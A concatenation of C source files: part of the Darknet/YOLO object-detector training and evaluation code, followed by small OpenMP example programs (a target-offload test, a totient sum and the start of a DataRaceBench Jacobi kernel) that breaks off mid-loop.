list *options = read_data_cfg(datacfg);
char *train_images = option_find_str(options, "train", "data/train.list");
char *backup_directory = option_find_str(options, "backup", "/backup/");
srand(time(0));
char *base = basecfg(cfgfile);
printf("%s\n", base);
float avg_loss = -1;
network **nets = calloc(ngpus, sizeof(network));
srand(time(0));
int seed = rand();
int i;
for(i = 0; i < ngpus; ++i){
srand(seed);
#ifdef GPU
cuda_set_device(gpus[i]);
#endif
nets[i] = load_network(cfgfile, weightfile, clear);
nets[i]->learning_rate *= ngpus;
}
srand(time(0));
network *net = nets[0];
int imgs = net->batch * net->subdivisions * ngpus;
printf("Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
data train, buffer;
layer l = net->layers[net->n - 1];
int classes = l.classes;
float jitter = l.jitter;
list *plist = get_paths(train_images);
//int N = plist->size;
char **paths = (char **)list_to_array(plist);
load_args args = get_base_args(net);
args.coords = l.coords;
args.paths = paths;
args.n = imgs;
args.m = plist->size;
args.classes = classes;
args.jitter = jitter;
args.num_boxes = l.max_boxes;
args.d = &buffer;
args.type = DETECTION_DATA;
//args.type = INSTANCE_DATA;
args.threads = 64;
pthread_t load_thread = load_data(args);
double time;
int count = 0;
//while(i*imgs < N*120){
while(get_current_batch(net) < net->max_batches){
if(l.random && count++%10 == 0){
printf("Resizing\n");
int dim = (rand() % 10 + 21) * 32;
if (get_current_batch(net)+200 > net->max_batches) dim = 960;
/* dim = 960; */
printf("%d\n", dim);
args.w = dim;
args.h = dim;
pthread_join(load_thread, 0);
train = buffer;
free_data(train);
load_thread = load_data(args);
#pragma omp parallel for
for(i = 0; i < ngpus; ++i){
resize_network(nets[i], dim, dim);
}
net = nets[0];
}
time=what_time_is_it_now();
pthread_join(load_thread, 0);
train = buffer;
load_thread = load_data(args);
/*
int k;
for(k = 0; k < l.max_boxes; ++k){
box b = float_to_box(train.y.vals[10] + 1 + k*5);
if(!b.x) break;
printf("loaded: %f %f %f %f\n", b.x, b.y, b.w, b.h);
}
*/
/*
int zz;
for(zz = 0; zz < train.X.cols; ++zz){
image im = float_to_image(net->w, net->h, 3, train.X.vals[zz]);
int k;
for(k = 0; k < l.max_boxes; ++k){
box b = float_to_box(train.y.vals[zz] + k*5, 1);
printf("%f %f %f %f\n", b.x, b.y, b.w, b.h);
draw_bbox(im, b, 1, 1,0,0);
}
show_image(im, "truth11");
cvWaitKey(0);
save_image(im, "truth11");
}
*/
printf("Loaded: %lf seconds\n", what_time_is_it_now()-time);
time=what_time_is_it_now();
float loss = 0;
#ifdef GPU
if(ngpus == 1){
loss = train_network(net, train);
} else {
loss = train_networks(nets, ngpus, train, 4);
}
#else
loss = train_network(net, train);
#endif
if (avg_loss < 0) avg_loss = loss;
avg_loss = avg_loss*.9 + loss*.1;
i = get_current_batch(net);
printf("%ld: %f, %f avg, %f rate, %lf seconds, %d images\n", get_current_batch(net), loss, avg_loss, get_current_rate(net), what_time_is_it_now()-time, i*imgs);
if(i%100==0){
#ifdef GPU
if(ngpus != 1) sync_nets(nets, ngpus, 0);
#endif
char buff[256];
sprintf(buff, "%s/%s.backup", backup_directory, base);
save_weights(net, buff);
}
if(i%10000==0 || (i < 1000 && i%100 == 0)){
#ifdef GPU
if(ngpus != 1) sync_nets(nets, ngpus, 0);
#endif
char buff[256];
sprintf(buff, "%s/%s_%d.weights", backup_directory, base, i);
save_weights(net, buff);
}
free_data(train);
}
#ifdef GPU
if(ngpus != 1) sync_nets(nets, ngpus, 0);
#endif
char buff[256];
sprintf(buff, "%s/%s_final.weights", backup_directory, base);
save_weights(net, buff);
}
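/* Extract the numeric COCO image id from a path: take the text after the
last '_' when present (file names of the form ..._000000001234.jpg),
otherwise after the last '/'. */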
static int get_coco_image_id(char *filename)
{
char *p = strrchr(filename, '/');
char *c = strrchr(filename, '_');
if(c) p = c;
return atoi(p+1);
}
static void print_cocos(FILE *fp, char *image_path, detection *dets, int num_boxes, int classes, int w, int h)
{
int i, j;
int image_id = get_coco_image_id(image_path);
for(i = 0; i < num_boxes; ++i){
float xmin = dets[i].bbox.x - dets[i].bbox.w/2.;
float xmax = dets[i].bbox.x + dets[i].bbox.w/2.;
float ymin = dets[i].bbox.y - dets[i].bbox.h/2.;
float ymax = dets[i].bbox.y + dets[i].bbox.h/2.;
if (xmin < 0) xmin = 0;
if (ymin < 0) ymin = 0;
if (xmax > w) xmax = w;
if (ymax > h) ymax = h;
float bx = xmin;
float by = ymin;
float bw = xmax - xmin;
float bh = ymax - ymin;
for(j = 0; j < classes; ++j){
if (dets[i].prob[j]) fprintf(fp, "{\"image_id\":%d, \"category_id\":%d, \"bbox\":[%f, %f, %f, %f], \"score\":%f},\n", image_id, coco_ids[j], bx, by, bw, bh, dets[i].prob[j]);
}
}
}
void print_detector_detections(FILE **fps, char *id, detection *dets, int total, int classes, int w, int h)
{
int i, j;
for(i = 0; i < total; ++i){
float xmin = dets[i].bbox.x - dets[i].bbox.w/2. + 1;
float xmax = dets[i].bbox.x + dets[i].bbox.w/2. + 1;
float ymin = dets[i].bbox.y - dets[i].bbox.h/2. + 1;
float ymax = dets[i].bbox.y + dets[i].bbox.h/2. + 1;
if (xmin < 1) xmin = 1;
if (ymin < 1) ymin = 1;
if (xmax > w) xmax = w;
if (ymax > h) ymax = h;
for(j = 0; j < classes; ++j){
if (dets[i].prob[j]) fprintf(fps[j], "%s %f %f %f %f %f\n", id, dets[i].prob[j],
xmin, ymin, xmax, ymax);
}
}
}
void print_imagenet_detections(FILE *fp, int id, detection *dets, int total, int classes, int w, int h)
{
int i, j;
for(i = 0; i < total; ++i){
float xmin = dets[i].bbox.x - dets[i].bbox.w/2.;
float xmax = dets[i].bbox.x + dets[i].bbox.w/2.;
float ymin = dets[i].bbox.y - dets[i].bbox.h/2.;
float ymax = dets[i].bbox.y + dets[i].bbox.h/2.;
if (xmin < 0) xmin = 0;
if (ymin < 0) ymin = 0;
if (xmax > w) xmax = w;
if (ymax > h) ymax = h;
for(j = 0; j < classes; ++j){
int class = j;
if (dets[i].prob[class]) fprintf(fp, "%d %d %f %f %f %f %f\n", id, j+1, dets[i].prob[class],
xmin, ymin, xmax, ymax);
}
}
}
void validate_detector_flip(char *datacfg, char *cfgfile, char *weightfile, char *outfile)
{
int j;
list *options = read_data_cfg(datacfg);
char *valid_images = option_find_str(options, "valid", "data/train.list");
char *name_list = option_find_str(options, "names", "data/names.list");
char *prefix = option_find_str(options, "results", "results");
char **names = get_labels(name_list);
char *mapf = option_find_str(options, "map", 0);
int *map = 0;
if (mapf) map = read_map(mapf);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 2);
fprintf(stderr, "Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
srand(time(0));
list *plist = get_paths(valid_images);
char **paths = (char **)list_to_array(plist);
layer l = net->layers[net->n-1];
int classes = l.classes;
char buff[1024];
char *type = option_find_str(options, "eval", "voc");
FILE *fp = 0;
FILE **fps = 0;
int coco = 0;
int imagenet = 0;
if(0==strcmp(type, "coco")){
if(!outfile) outfile = "coco_results";
snprintf(buff, 1024, "%s/%s.json", prefix, outfile);
fp = fopen(buff, "w");
fprintf(fp, "[\n");
coco = 1;
} else if(0==strcmp(type, "imagenet")){
if(!outfile) outfile = "imagenet-detection";
snprintf(buff, 1024, "%s/%s.txt", prefix, outfile);
fp = fopen(buff, "w");
imagenet = 1;
classes = 200;
} else {
if(!outfile) outfile = "comp4_det_test_";
fps = calloc(classes, sizeof(FILE *));
for(j = 0; j < classes; ++j){
snprintf(buff, 1024, "%s/%s%s.txt", prefix, outfile, names[j]);
fps[j] = fopen(buff, "w");
}
}
int m = plist->size;
int i=0;
int t;
float thresh = .005;
float nms = .45;
int nthreads = 4;
image *val = calloc(nthreads, sizeof(image));
image *val_resized = calloc(nthreads, sizeof(image));
image *buf = calloc(nthreads, sizeof(image));
image *buf_resized = calloc(nthreads, sizeof(image));
pthread_t *thr = calloc(nthreads, sizeof(pthread_t));
image input = make_image(net->w, net->h, net->c*2);
load_args args = {0};
args.w = net->w;
args.h = net->h;
//args.type = IMAGE_DATA;
args.type = LETTERBOX_DATA;
for(t = 0; t < nthreads; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
double start = what_time_is_it_now();
for(i = nthreads; i < m+nthreads; i += nthreads){
fprintf(stderr, "%d\n", i);
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
pthread_join(thr[t], 0);
val[t] = buf[t];
val_resized[t] = buf_resized[t];
}
for(t = 0; t < nthreads && i+t < m; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
char *path = paths[i+t-nthreads];
char *id = basecfg(path);
copy_cpu(net->w*net->h*net->c, val_resized[t].data, 1, input.data, 1);
flip_image(val_resized[t]);
copy_cpu(net->w*net->h*net->c, val_resized[t].data, 1, input.data + net->w*net->h*net->c, 1);
network_predict(net, input.data);
int w = val[t].w;
int h = val[t].h;
int num = 0;
detection *dets = get_network_boxes(net, w, h, thresh, .5, map, 0, &num);
if (nms) do_nms_sort(dets, num, classes, nms);
if (coco){
print_cocos(fp, path, dets, num, classes, w, h);
} else if (imagenet){
print_imagenet_detections(fp, i+t-nthreads+1, dets, num, classes, w, h);
} else {
print_detector_detections(fps, id, dets, num, classes, w, h);
}
free_detections(dets, num);
free(id);
free_image(val[t]);
free_image(val_resized[t]);
}
}
for(j = 0; j < classes; ++j){
if(fps) fclose(fps[j]);
}
if(coco){
fseek(fp, -2, SEEK_CUR);
fprintf(fp, "\n]\n");
fclose(fp);
}
fprintf(stderr, "Total Detection Time: %f Seconds\n", what_time_is_it_now() - start);
}
void validate_detector(char *datacfg, char *cfgfile, char *weightfile, char *outfile)
{
int j;
list *options = read_data_cfg(datacfg);
char *valid_images = option_find_str(options, "valid", "data/train.list");
char *name_list = option_find_str(options, "names", "data/names.list");
char *prefix = option_find_str(options, "results", "results");
char **names = get_labels(name_list);
char *mapf = option_find_str(options, "map", 0);
int *map = 0;
if (mapf) map = read_map(mapf);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
fprintf(stderr, "Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
srand(time(0));
list *plist = get_paths(valid_images);
char **paths = (char **)list_to_array(plist);
layer l = net->layers[net->n-1];
int classes = l.classes;
char buff[1024];
char *type = option_find_str(options, "eval", "voc");
FILE *fp = 0;
FILE **fps = 0;
int coco = 0;
int imagenet = 0;
if(0==strcmp(type, "coco")){
if(!outfile) outfile = "coco_results";
snprintf(buff, 1024, "%s/%s.json", prefix, outfile);
fp = fopen(buff, "w");
fprintf(fp, "[\n");
coco = 1;
} else if(0==strcmp(type, "imagenet")){
if(!outfile) outfile = "imagenet-detection";
snprintf(buff, 1024, "%s/%s.txt", prefix, outfile);
fp = fopen(buff, "w");
imagenet = 1;
classes = 200;
} else {
if(!outfile) outfile = "comp4_det_test_";
fps = calloc(classes, sizeof(FILE *));
for(j = 0; j < classes; ++j){
snprintf(buff, 1024, "%s/%s%s.txt", prefix, outfile, names[j]);
fps[j] = fopen(buff, "w");
}
}
int m = plist->size;
int i=0;
int t;
float thresh = .005;
float nms = .45;
int nthreads = 4;
image *val = calloc(nthreads, sizeof(image));
image *val_resized = calloc(nthreads, sizeof(image));
image *buf = calloc(nthreads, sizeof(image));
image *buf_resized = calloc(nthreads, sizeof(image));
pthread_t *thr = calloc(nthreads, sizeof(pthread_t));
load_args args = {0};
args.w = net->w;
args.h = net->h;
//args.type = IMAGE_DATA;
args.type = LETTERBOX_DATA;
for(t = 0; t < nthreads; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
double start = what_time_is_it_now();
for(i = nthreads; i < m+nthreads; i += nthreads){
fprintf(stderr, "%d\n", i);
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
pthread_join(thr[t], 0);
val[t] = buf[t];
val_resized[t] = buf_resized[t];
}
for(t = 0; t < nthreads && i+t < m; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
char *path = paths[i+t-nthreads];
char *id = basecfg(path);
float *X = val_resized[t].data;
network_predict(net, X);
int w = val[t].w;
int h = val[t].h;
int nboxes = 0;
detection *dets = get_network_boxes(net, w, h, thresh, .5, map, 0, &nboxes);
if (nms) do_nms_sort(dets, nboxes, classes, nms);
if (coco){
print_cocos(fp, path, dets, nboxes, classes, w, h);
} else if (imagenet){
print_imagenet_detections(fp, i+t-nthreads+1, dets, nboxes, classes, w, h);
} else {
print_detector_detections(fps, id, dets, nboxes, classes, w, h);
}
free_detections(dets, nboxes);
free(id);
free_image(val[t]);
free_image(val_resized[t]);
}
}
for(j = 0; j < classes; ++j){
if(fps) fclose(fps[j]);
}
if(coco){
fseek(fp, -2, SEEK_CUR);
fprintf(fp, "\n]\n");
fclose(fp);
}
fprintf(stderr, "Total Detection Time: %f Seconds\n", what_time_is_it_now() - start);
}
void validate_detector_recall(char *cfgfile, char *weightfile)
{
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
fprintf(stderr, "Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
srand(time(0));
list *plist = get_paths("data/coco_val_5k.list");
char **paths = (char **)list_to_array(plist);
layer l = net->layers[net->n-1];
int j, k;
int m = plist->size;
int i=0;
float thresh = .001;
float iou_thresh = .5;
float nms = .4;
int total = 0;
int correct = 0;
int proposals = 0;
float avg_iou = 0;
for(i = 0; i < m; ++i){
char *path = paths[i];
image orig = load_image_color(path, 0, 0);
image sized = resize_image(orig, net->w, net->h);
char *id = basecfg(path);
network_predict(net, sized.data);
int nboxes = 0;
detection *dets = get_network_boxes(net, sized.w, sized.h, thresh, .5, 0, 1, &nboxes);
if (nms) do_nms_obj(dets, nboxes, 1, nms);
char labelpath[4096];
find_replace(path, "images", "labels", labelpath);
find_replace(labelpath, "JPEGImages", "labels", labelpath);
find_replace(labelpath, ".jpg", ".txt", labelpath);
find_replace(labelpath, ".JPEG", ".txt", labelpath);
int num_labels = 0;
box_label *truth = read_boxes(labelpath, &num_labels);
for(k = 0; k < nboxes; ++k){
if(dets[k].objectness > thresh){
++proposals;
}
}
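/* For every ground-truth box, find the predicted box with the highest IoU
among the above-threshold detections; it counts as correct when that best
IoU exceeds iou_thresh. */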
for (j = 0; j < num_labels; ++j) {
++total;
box t = {truth[j].x, truth[j].y, truth[j].w, truth[j].h};
float best_iou = 0;
for(k = 0; k < nboxes; ++k){ /* only the returned detections are valid */
float iou = box_iou(dets[k].bbox, t);
if(dets[k].objectness > thresh && iou > best_iou){
best_iou = iou;
}
}
avg_iou += best_iou;
if(best_iou > iou_thresh){
++correct;
}
}
fprintf(stderr, "%5d %5d %5d\tRPs/Img: %.2f\tIOU: %.2f%%\tRecall:%.2f%%\n", i, correct, total, (float)proposals/(i+1), avg_iou*100/total, 100.*correct/total);
free(id);
free_image(orig);
free_image(sized);
}
}
void test_detector(char *datacfg, char *cfgfile, char *weightfile, char *filename, float thresh, float hier_thresh, char *outfile, int fullscreen)
{
list *options = read_data_cfg(datacfg);
char *name_list = option_find_str(options, "names", "data/names.list");
char **names = get_labels(name_list);
image **alphabet = load_alphabet();
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
srand(2222222);
double time;
char buff[256];
char *input = buff;
float nms=.45;
while(1){
if(filename){
strncpy(input, filename, 256);
} else {
printf("Enter Image Path: ");
fflush(stdout);
input = fgets(input, 256, stdin);
if(!input) return;
strtok(input, "\n");
}
image im = load_image_color(input,0,0);
image sized = letterbox_image(im, net->w, net->h);
//image sized = resize_image(im, net->w, net->h);
//image sized2 = resize_max(im, net->w);
//image sized = crop_image(sized2, -((net->w - sized2.w)/2), -((net->h - sized2.h)/2), net->w, net->h);
//resize_network(net, sized.w, sized.h);
layer l = net->layers[net->n-1];
float *X = sized.data;
time=what_time_is_it_now();
network_predict(net, X);
printf("%s: Predicted in %f seconds.\n", input, what_time_is_it_now()-time);
int nboxes = 0;
detection *dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, 0, 1, &nboxes);
//printf("%d\n", nboxes);
//if (nms) do_nms_obj(boxes, probs, l.w*l.h*l.n, l.classes, nms);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
draw_detections(im, dets, nboxes, thresh, names, alphabet, l.classes);
free_detections(dets, nboxes);
if(outfile){
save_image(im, outfile);
}
else{
save_image(im, "predictions");
#ifdef OPENCV
make_window("predictions", 512, 512, 0);
show_image(im, "predictions", 0);
#endif
}
free_image(im);
free_image(sized);
if (filename) break;
}
}
/*
void censor_detector(char *datacfg, char *cfgfile, char *weightfile, int cam_index, const char *filename, int class, float thresh, int skip)
{
#ifdef OPENCV
char *base = basecfg(cfgfile);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
srand(2222222);
CvCapture * cap;
int w = 1280;
int h = 720;
if(filename){
cap = cvCaptureFromFile(filename);
}else{
cap = cvCaptureFromCAM(cam_index);
}
if(w){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_WIDTH, w);
}
if(h){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_HEIGHT, h);
}
if(!cap) error("Couldn't connect to webcam.\n");
cvNamedWindow(base, CV_WINDOW_NORMAL);
cvResizeWindow(base, 512, 512);
float fps = 0;
int i;
float nms = .45;
while(1){
image in = get_image_from_stream(cap);
//image in_s = resize_image(in, net->w, net->h);
image in_s = letterbox_image(in, net->w, net->h);
layer l = net->layers[net->n-1];
float *X = in_s.data;
network_predict(net, X);
int nboxes = 0;
detection *dets = get_network_boxes(net, in.w, in.h, thresh, 0, 0, 0, &nboxes);
//if (nms) do_nms_obj(boxes, probs, l.w*l.h*l.n, l.classes, nms);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
for(i = 0; i < nboxes; ++i){
if(dets[i].prob[class] > thresh){
box b = dets[i].bbox;
int left = b.x-b.w/2.;
int top = b.y-b.h/2.;
censor_image(in, left, top, b.w, b.h);
}
}
show_image(in, base);
cvWaitKey(10);
free_detections(dets, nboxes);
free_image(in_s);
free_image(in);
float curr = 0;
fps = .9*fps + .1*curr;
for(i = 0; i < skip; ++i){
image in = get_image_from_stream(cap);
free_image(in);
}
}
#endif
}
void extract_detector(char *datacfg, char *cfgfile, char *weightfile, int cam_index, const char *filename, int class, float thresh, int skip)
{
#ifdef OPENCV
char *base = basecfg(cfgfile);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
srand(2222222);
CvCapture * cap;
int w = 1280;
int h = 720;
if(filename){
cap = cvCaptureFromFile(filename);
}else{
cap = cvCaptureFromCAM(cam_index);
}
if(w){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_WIDTH, w);
}
if(h){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_HEIGHT, h);
}
if(!cap) error("Couldn't connect to webcam.\n");
cvNamedWindow(base, CV_WINDOW_NORMAL);
cvResizeWindow(base, 512, 512);
float fps = 0;
int i;
int count = 0;
float nms = .45;
while(1){
image in = get_image_from_stream(cap);
//image in_s = resize_image(in, net->w, net->h);
image in_s = letterbox_image(in, net->w, net->h);
layer l = net->layers[net->n-1];
show_image(in, base);
int nboxes = 0;
float *X = in_s.data;
network_predict(net, X);
detection *dets = get_network_boxes(net, in.w, in.h, thresh, 0, 0, 1, &nboxes);
//if (nms) do_nms_obj(boxes, probs, l.w*l.h*l.n, l.classes, nms);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
for(i = 0; i < nboxes; ++i){
if(dets[i].prob[class] > thresh){
box b = dets[i].bbox;
int size = b.w*in.w > b.h*in.h ? b.w*in.w : b.h*in.h;
int dx = b.x*in.w-size/2.;
int dy = b.y*in.h-size/2.;
image bim = crop_image(in, dx, dy, size, size);
char buff[2048];
sprintf(buff, "results/extract/%07d", count);
++count;
save_image(bim, buff);
free_image(bim);
}
}
free_detections(dets, nboxes);
free_image(in_s);
free_image(in);
float curr = 0;
fps = .9*fps + .1*curr;
for(i = 0; i < skip; ++i){
image in = get_image_from_stream(cap);
free_image(in);
}
}
#endif
}
*/
/*
void network_detect(network *net, image im, float thresh, float hier_thresh, float nms, detection *dets)
{
network_predict_image(net, im);
layer l = net->layers[net->n-1];
int nboxes = num_boxes(net);
fill_network_boxes(net, im.w, im.h, thresh, hier_thresh, 0, 0, dets);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
}
*/
void run_detector(int argc, char **argv)
{
char *prefix = find_char_arg(argc, argv, "-prefix", 0);
float thresh = find_float_arg(argc, argv, "-thresh", .5);
float hier_thresh = find_float_arg(argc, argv, "-hier", .5);
int cam_index = find_int_arg(argc, argv, "-c", 0);
int frame_skip = find_int_arg(argc, argv, "-s", 0);
int avg = find_int_arg(argc, argv, "-avg", 3);
if(argc < 4){
fprintf(stderr, "usage: %s %s [train/test/valid] [cfg] [weights (optional)]\n", argv[0], argv[1]);
return;
}
char *gpu_list = find_char_arg(argc, argv, "-gpus", 0);
char *outfile = find_char_arg(argc, argv, "-out", 0);
int *gpus = 0;
int gpu = 0;
int ngpus = 0;
if(gpu_list){
printf("%s\n", gpu_list);
int len = strlen(gpu_list);
ngpus = 1;
int i;
for(i = 0; i < len; ++i){
if (gpu_list[i] == ',') ++ngpus;
}
gpus = calloc(ngpus, sizeof(int));
for(i = 0; i < ngpus; ++i){
gpus[i] = atoi(gpu_list);
gpu_list = strchr(gpu_list, ',')+1;
}
} else {
gpu = gpu_index;
gpus = &gpu;
ngpus = 1;
}
int clear = find_arg(argc, argv, "-clear");
int fullscreen = find_arg(argc, argv, "-fullscreen");
int width = find_int_arg(argc, argv, "-w", 0);
int height = find_int_arg(argc, argv, "-h", 0);
int fps = find_int_arg(argc, argv, "-fps", 0);
//int class = find_int_arg(argc, argv, "-class", 0);
char *datacfg = argv[3];
char *cfg = argv[4];
char *weights = (argc > 5) ? argv[5] : 0;
char *filename = (argc > 6) ? argv[6]: 0;
if(0==strcmp(argv[2], "test")) test_detector(datacfg, cfg, weights, filename, thresh, hier_thresh, outfile, fullscreen);
else if(0==strcmp(argv[2], "train")) train_detector(datacfg, cfg, weights, gpus, ngpus, clear);
else if(0==strcmp(argv[2], "valid")) validate_detector(datacfg, cfg, weights, outfile);
else if(0==strcmp(argv[2], "valid2")) validate_detector_flip(datacfg, cfg, weights, outfile);
else if(0==strcmp(argv[2], "recall")) validate_detector_recall(cfg, weights);
else if(0==strcmp(argv[2], "demo")) {
list *options = read_data_cfg(datacfg);
int classes = option_find_int(options, "classes", 20);
char *name_list = option_find_str(options, "names", "data/names.list");
char **names = get_labels(name_list);
demo(cfg, weights, thresh, cam_index, filename, names, classes, frame_skip, prefix, avg, hier_thresh, width, height, fps, fullscreen);
}
//else if(0==strcmp(argv[2], "extract")) extract_detector(datacfg, cfg, weights, cam_index, filename, class, thresh, frame_skip);
//else if(0==strcmp(argv[2], "censor")) censor_detector(datacfg, cfg, weights, cam_index, filename, class, thresh, frame_skip);
}
|
app_main.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h> /* uint8_t / uint32_t */
#include "bmp_interface.h"
#include <omp.h>
extern int __htc_get_unit_count();
extern int global_radius;
int app_main(int argc, char **argv) {
uint32_t bufsize = 1000;
// Allocate target temp buffer.
extern void *stencil_cp_alloc(size_t);
uint8_t *unew = (uint8_t *)stencil_cp_alloc(bufsize * sizeof(uint8_t));
printf("unit count is %d\n", __htc_get_unit_count());
int i;
#pragma omp target
#pragma omp teams distribute parallel for num_teams(4) num_threads(8)
for (i = 0; i < bufsize; i++) {
printf("team %d thread %d i is %d\n", (int)omp_get_team_num(),
(int)omp_get_thread_num(), i);
unew[i] = omp_get_team_num() * omp_get_thread_num();
}
int sum = 0;
for (i = 0; i < bufsize; i++) {
// printf("i = %d val = %d\n", i, unew[i]);
sum += unew[i];
}
printf("sum is %d %s\n", sum, (sum == 5124) ? "PASSED" : "FAILED");
return 0;
}
|
ab-totient-omp-14.c | // Distributed and parallel technologies, Andrew Beveridge, 03/03/2014
// To Compile: gcc -Wall -O -o ab-totient-omp -fopenmp ab-totient-omp.c
// To Run / Time: /usr/bin/time -v ./ab-totient-omp range_start range_end
#include <stdio.h>
#include <omp.h>
/* When the input is a prime p, the totient is simply p - 1. The totient is even for every n > 2.
If n is a positive integer, then φ(n) is the number of integers k in the range 1 ≤ k ≤ n for which gcd(n, k) = 1. */
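/* getTotient() applies Euler's product formula,
phi(n) = n * prod_{p | n, p prime} (1 - 1/p),
taking each distinct prime factor into account via result -= result / p. */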
long getTotient (long number) {
long result = number;
// Check every prime number below the square root for divisibility
if(number % 2 == 0){
result -= result / 2;
do
number /= 2;
while(number %2 == 0);
}
// Primitive replacement for a list of primes, looping through every odd number
long prime;
for(prime = 3; prime * prime <= number; prime += 2){
if(number %prime == 0){
result -= result / prime;
do
number /= prime;
while(number % prime == 0);
}
}
// Last common factor
if(number > 1)
result -= result / number;
// Return the result.
return result;
}
// Main method.
int main(int argc, char ** argv) {
// Load inputs
long lower, upper;
sscanf(argv[1], "%ld", &lower);
sscanf(argv[2], "%ld", &upper);
long i; // match the long range bounds to avoid overflow on large inputs
long result = 0;
// We know the answer if it's 1; no need to execute the function
if(lower == 1) {
result = 1;
lower = 2;
}
#pragma omp parallel for default(shared) private(i) schedule(auto) reduction(+:result) num_threads(14)
// Sum all totients in the specified range
for (i = lower; i <= upper; i++) {
result = result + getTotient(i);
}
// Print the result
printf("Sum of Totients between [%ld..%ld] is %ld \n", lower, upper, result);
// A-OK!
return 0;
}
|
DRB058-jacobikernel-orig-no.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
Two parallel for loops within one single parallel region,
combined with private() and reduction().
*/
#include <stdio.h>
#include <math.h>
#define MSIZE 200
int n=MSIZE, m=MSIZE, mits=1000;
double tol=0.0000000001, relax = 1.0, alpha = 0.0543;
double u[MSIZE][MSIZE], f[MSIZE][MSIZE], uold[MSIZE][MSIZE];
double dx, dy;
void
initialize ()
{
int i, j, xx, yy;
dx = 2.0 / (n - 1);
dy = 2.0 / (m - 1);
/* Initialize initial condition and RHS */
//#pragma omp parallel for private(i,j,xx,yy)
#pragma omp parallel for private(xx ,yy)
for (i = 0; i < n; i++)
#pragma omp parallel for private(xx ,yy)
for (j = 0; j < m; j++)
{
xx = (int) (-1.0 + dx * (i - 1)); /* -1 < x < 1 */
yy = (int) (-1.0 + dy * (j - 1)); /* -1 < y < 1 */
u[i][j] = 0.0;
f[i][j] = -1.0 * alpha * (1.0 - xx * xx) * (1.0 - yy * yy)
- 2.0 * (1.0 - xx * xx) - 2.0 * (1.0 - yy * yy);
}
}
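/* jacobi() performs damped Jacobi sweeps on the 5-point stencil:
resid = (ax*(u_W + u_E) + ay*(u_S + u_N) + b*u_C - f) / b
u_new = u_old - omega * resid
with the squared residuals accumulated through reduction(+:error). */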
void
jacobi ()
{
double omega;
int i, j, k;
double error, resid, ax, ay, b;
omega = relax;
/* Initialize coefficients */
dx = 2.0 / (n - 1);
dy = 2.0 / (m - 1);
ax = 1.0 / (dx * dx); /* X-direction coef */
ay = 1.0 / (dy * dy); /* Y-direction coef */
b = -2.0 / (dx * dx) - 2.0 / (dy * dy) - alpha; /* Central coeff */
error = 10.0 * tol;
k = 1;
while (k <= mits)
{
error = 0.0;
/* Copy new solution into old */
#pragma omp parallel for
for (i = 0; i < n; i++)
#pragma omp parallel for
